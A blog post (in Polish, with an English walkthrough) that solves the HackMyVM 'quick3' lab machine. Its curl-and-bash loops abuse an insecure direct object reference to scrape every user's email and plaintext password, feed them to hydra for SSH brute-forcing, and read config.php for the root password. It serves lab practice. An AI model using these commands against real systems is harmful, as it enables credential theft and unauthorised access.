Marcin

Marcin

Zajmuję się komputerami od lat 90. (XX wieku). Najpierw był C64, potem Amiga, a od 25 lat PC. Tematy tutaj poruszane będą różne, ale głównie związane z IT i wycieczkami rowerowymi.

quick3 - eMVee

00. Metainfo

Title: quick3
Author: eMVee
Release date: 2024-02-19
Download from: HackMyVM
Level: Easy
System: linux
You’ll learn: Bash scripting

01. Register new user

export IP=172.16.1.127
curl -d "name=newuser&email=newmail@newmail.com&password=password&register=Register" http://$IP/customer/index.php

# Registration successful

02. Login and get a cookie

curl -v -d 'email=newmail@newmail.com&password=password&login=Login' 'http://172.16.1.127/customer/login.php'

# *   Trying 172.16.1.127:80...
# * Connected to 172.16.1.127 (172.16.1.127) port 80
# > POST /customer/login.php HTTP/1.1
# > Host: 172.16.1.127
# > User-Agent: curl/8.5.0
# > Accept: */*
# > Content-Length: 55
# > Content-Type: application/x-www-form-urlencoded
# > 
# < HTTP/1.1 302 Found
# < Date: Tue, 20 Feb 2024 00:06:22 GMT
# < Server: Apache/2.4.52 (Ubuntu)
# < Set-Cookie: PHPSESSID=hab58kcfs74fgp9vtv78i92de5; path=/
# < Expires: Thu, 19 Nov 1981 08:52:00 GMT
# < Cache-Control: no-store, no-cache, must-revalidate
# < Pragma: no-cache
# < location: dashboard.php
# < Content-Length: 0
# < Content-Type: text/html; charset=UTF-8
# < 
# * Connection #0 to host 172.16.1.127 left intact

03. Create a list of emails

cookie="PHPSESSID=hab58kcfs74fgp9vtv78i92de5"
pattern1="fa-envelope-o"
pattern2=": .*@*<"
pattern3=' :<'

for i in {1..28}; do
        curl -s -b "$cookie" http://$IP/customer/user.php?id=$i | grep $pattern1 | grep -o "$pattern2" | tr -d "$pattern3"
done > emails.txt

04. Create a list of passwords

cookie="PHPSESSID=hab58kcfs74fgp9vtv78i92de5"
pattern1="oldpassword\" value="
pattern2="value=\".*\""
pattern3='s/value=//g; s/"//g'

for i in {1..28}; do
        curl -s -b "$cookie" http://$IP/customer/user.php?id=$i | grep "$pattern1" | grep -o "$pattern2" | sed "$pattern3"
done > passwords.txt

05. Create a list of the type user:pass

paste emails.txt passwords.txt | sed 's/@.*hmv/:/' | tr -d ' \t' > user_pass.txt
cat user_pass.txt | awk -F'[.:]' {'print $1":"$NF'} > user_pass2.txt

06. Find the password for the SSH user

hydra -V -C user_pass2.txt ssh://$IP

07. Find the password for the root user

bash
cat /var/www/html/customer/config.php

Zostaw komentarz

Także może Ci się spodobać